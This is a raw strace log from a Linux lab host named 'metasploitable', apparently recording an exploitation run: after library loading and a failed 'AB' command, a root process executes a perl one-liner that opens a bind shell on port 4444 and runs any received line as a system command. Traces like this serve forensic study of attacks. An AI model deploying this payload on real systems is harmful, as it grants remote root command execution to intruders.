7898  07:20:55.037490 mmap2(0xb7d6e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d6e000

7898  07:20:55.037506 mmap2(0xb7d70000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d70000

7898  07:20:55.037520 close(1)          = 0

7898  07:20:55.037546 munmap(0xb7f00000, 29913) = 0

7898  07:20:55.037564 open("/etc/ld.so.cache", O_RDONLY) = 1

7898  07:20:55.037577 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7898  07:20:55.037593 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f00000

7898  07:20:55.037604 close(1)          = 0

7898  07:20:55.037614 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.037629 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7898  07:20:55.037643 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7898  07:20:55.037732 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7898  07:20:55.037750 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d50000

7898  07:20:55.037761 mmap2(0xb7d58000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d58000

7898  07:20:55.037778 close(1)          = 0

7898  07:20:55.037802 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7898  07:20:55.037847 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7898  07:20:55.037862 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7898  07:20:55.037970 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7898  07:20:55.037988 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d45000

7898  07:20:55.038000 mmap2(0xb7d4e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4e000

7898  07:20:55.038016 close(1)          = 0

7898  07:20:55.038038 munmap(0xb7f00000, 29913) = 0

7898  07:20:55.038054 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7898  07:20:55.038069 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7898  07:20:55.038081 _llseek(1, 0, [0], SEEK_CUR) = 0

7898  07:20:55.038093 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7898  07:20:55.038109 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f07000

7898  07:20:55.038120 _llseek(1, 1624, [1624], SEEK_SET) = 0

7898  07:20:55.038136 munmap(0xb7f07000, 1624) = 0

7898  07:20:55.038146 close(1)          = 0

7898  07:20:55.038174 getpgrp()         = 3831

7898  07:20:55.038185 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7898  07:20:55.038200 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7898  07:20:55.038216 brk(0x8101000)    = 0x8101000

7898  07:20:55.038248 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.038262 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.038277 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7898  07:20:55.038327 brk(0x8102000)    = 0x8102000

7898  07:20:55.038355 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7898  07:20:55.038373 stat64("/sbin/AB", 0xbfac1918) = -1 ENOENT (No such file or directory)

7898  07:20:55.038386 stat64("/bin/AB", 0xbfac1918) = -1 ENOENT (No such file or directory)

7898  07:20:55.038398 stat64("/usr/sbin/AB", 0xbfac1918) = -1 ENOENT (No such file or directory)

7898  07:20:55.038409 stat64("/usr/bin/AB", 0xbfac1918) = -1 ENOENT (No such file or directory)

7898  07:20:55.038423 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7898  07:20:55.038438 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d7b6f8) = 7899

7899  07:20:55.038483 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7899  07:20:55.038499 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7899  07:20:55.038512 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7899  07:20:55.038525 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7899  07:20:55.038540 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7899  07:20:55.038556 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7899  07:20:55.038569 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7899  07:20:55.038624 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7899  07:20:55.038638 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7899  07:20:55.038707 exit_group(127)   = ?

4519  07:20:55.051100 waitpid(7898,  <unfinished ...>

7898  07:20:55.051101 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7898  07:20:55.060832 --- SIGCHLD (Child exited) @ 0 (0) ---

7898  07:20:55.060832 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7899

7898  07:20:55.060833 waitpid(-1, 0xbfac1598, WNOHANG) = -1 ECHILD (No child processes)

7898  07:20:55.060833 sigreturn()       = ? (mask now [])

7898  07:20:55.060833 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7898  07:20:55.060833 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7898  07:20:55.060839 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7898  07:20:55.060852 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7898  07:20:55.060871 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7898  07:20:55.060882 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7898  07:20:55.060917 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7898  07:20:55.060937 stat64("/sbin/perl", 0xbfac1948) = -1 ENOENT (No such file or directory)

7898  07:20:55.060950 stat64("/bin/perl", 0xbfac1948) = -1 ENOENT (No such file or directory)

7898  07:20:55.060961 stat64("/usr/sbin/perl", 0xbfac1948) = -1 ENOENT (No such file or directory)

7898  07:20:55.060973 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7898  07:20:55.060992 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7898  07:20:55.061017 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7898  07:20:55.061032 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d7b6f8) = 7900

7900  07:20:55.061079 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7900  07:20:55.061096 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7900  07:20:55.061109 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7900  07:20:55.061178 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7900  07:20:55.061196 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7900  07:20:55.061245 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7900  07:20:55.061273 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7900  07:20:55.061307 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7900  07:20:55.061397 brk(0)            = 0x8153000

7900  07:20:55.061417 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.061433 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcc000

7900  07:20:55.061449 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.061466 open("/etc/ld.so.cache", O_RDONLY) = 1

7900  07:20:55.061479 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7900  07:20:55.061496 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc4000

7900  07:20:55.061507 close(1)          = 0

7900  07:20:55.061517 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.061532 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7900  07:20:55.061547 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7900  07:20:55.061719 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7900  07:20:55.061742 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fc0000

7900  07:20:55.061755 mmap2(0xb7fc2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fc2000

7900  07:20:55.061772 close(1)          = 0

7900  07:20:55.061784 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.061798 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7900  07:20:55.061812 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7900  07:20:55.061950 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7900  07:20:55.062001 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9b000

7900  07:20:55.062027 mmap2(0xb7fbe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fbe000

7900  07:20:55.062071 close(1)          = 0

7900  07:20:55.062102 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.062139 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7900  07:20:55.062189 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7900  07:20:55.062308 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7900  07:20:55.062325 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9a000

7900  07:20:55.062340 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f82000

7900  07:20:55.062351 mmap2(0xb7f96000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f96000

7900  07:20:55.062381 mmap2(0xb7f98000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f98000

7900  07:20:55.062395 close(1)          = 0

7900  07:20:55.062407 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.062421 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7900  07:20:55.062435 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7900  07:20:55.062527 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7900  07:20:55.062545 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e33000

7900  07:20:55.062557 mmap2(0xb7f7c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f7c000

7900  07:20:55.062571 mmap2(0xb7f7f000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f7f000

7900  07:20:55.062585 close(1)          = 0

7900  07:20:55.062597 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7900  07:20:55.062610 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7900  07:20:55.062625 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7900  07:20:55.062736 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7900  07:20:55.062754 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e01000

7900  07:20:55.062766 mmap2(0xb7e0a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e0a000

7900  07:20:55.062780 mmap2(0xb7e0c000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e0c000

7900  07:20:55.062794 close(1)          = 0

7900  07:20:55.062818 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e00000

7900  07:20:55.062832 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e008c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7900  07:20:55.062895 mprotect(0xb7f7c000, 4096, PROT_READ) = 0

7900  07:20:55.062922 munmap(0xb7fc4000, 29913) = 0

7900  07:20:55.062935 set_tid_address(0xb7e00908) = 7900

7900  07:20:55.062944 set_robust_list(0xb7e00910, 0xc) = 0

7900  07:20:55.062954 futex(0xbfb487e0, 0x81 /* FUTEX_??? */, 1) = 0

7900  07:20:55.062969 rt_sigaction(SIGRTMIN, {0xb7f862c0, [], SA_SIGINFO}, NULL, 8) = 0

7900  07:20:55.062986 rt_sigaction(SIGRT_1, {0xb7f86340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7900  07:20:55.062999 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7900  07:20:55.063013 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7900  07:20:55.063032 uname({sys="Linux", node="metasploitable", ...}) = 0

7900  07:20:55.063078 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7900  07:20:55.063178 brk(0)            = 0x8153000

7900  07:20:55.063189 brk(0x8174000)    = 0x8174000

7900  07:20:55.063232 getuid32()        = 0

7900  07:20:55.063242 geteuid32()       = 0

7900  07:20:55.063252 getgid32()        = 0

7900  07:20:55.063261 getegid32()       = 0

7900  07:20:55.063298 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ddf000

7900  07:20:55.063325 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7900  07:20:55.063342 read(1, "\205\206\7\265", 4) = 4

7900  07:20:55.063356 close(1)          = 0

7900  07:20:55.063374 time(NULL)        = 1495624855

7900  07:20:55.063415 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfb484b0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063433 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfb484b0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063446 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfb484b0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063462 stat64("/usr/local/lib/perl/5.8.7", 0xbfb485f0) = -1 ENOENT (No such file or directory)

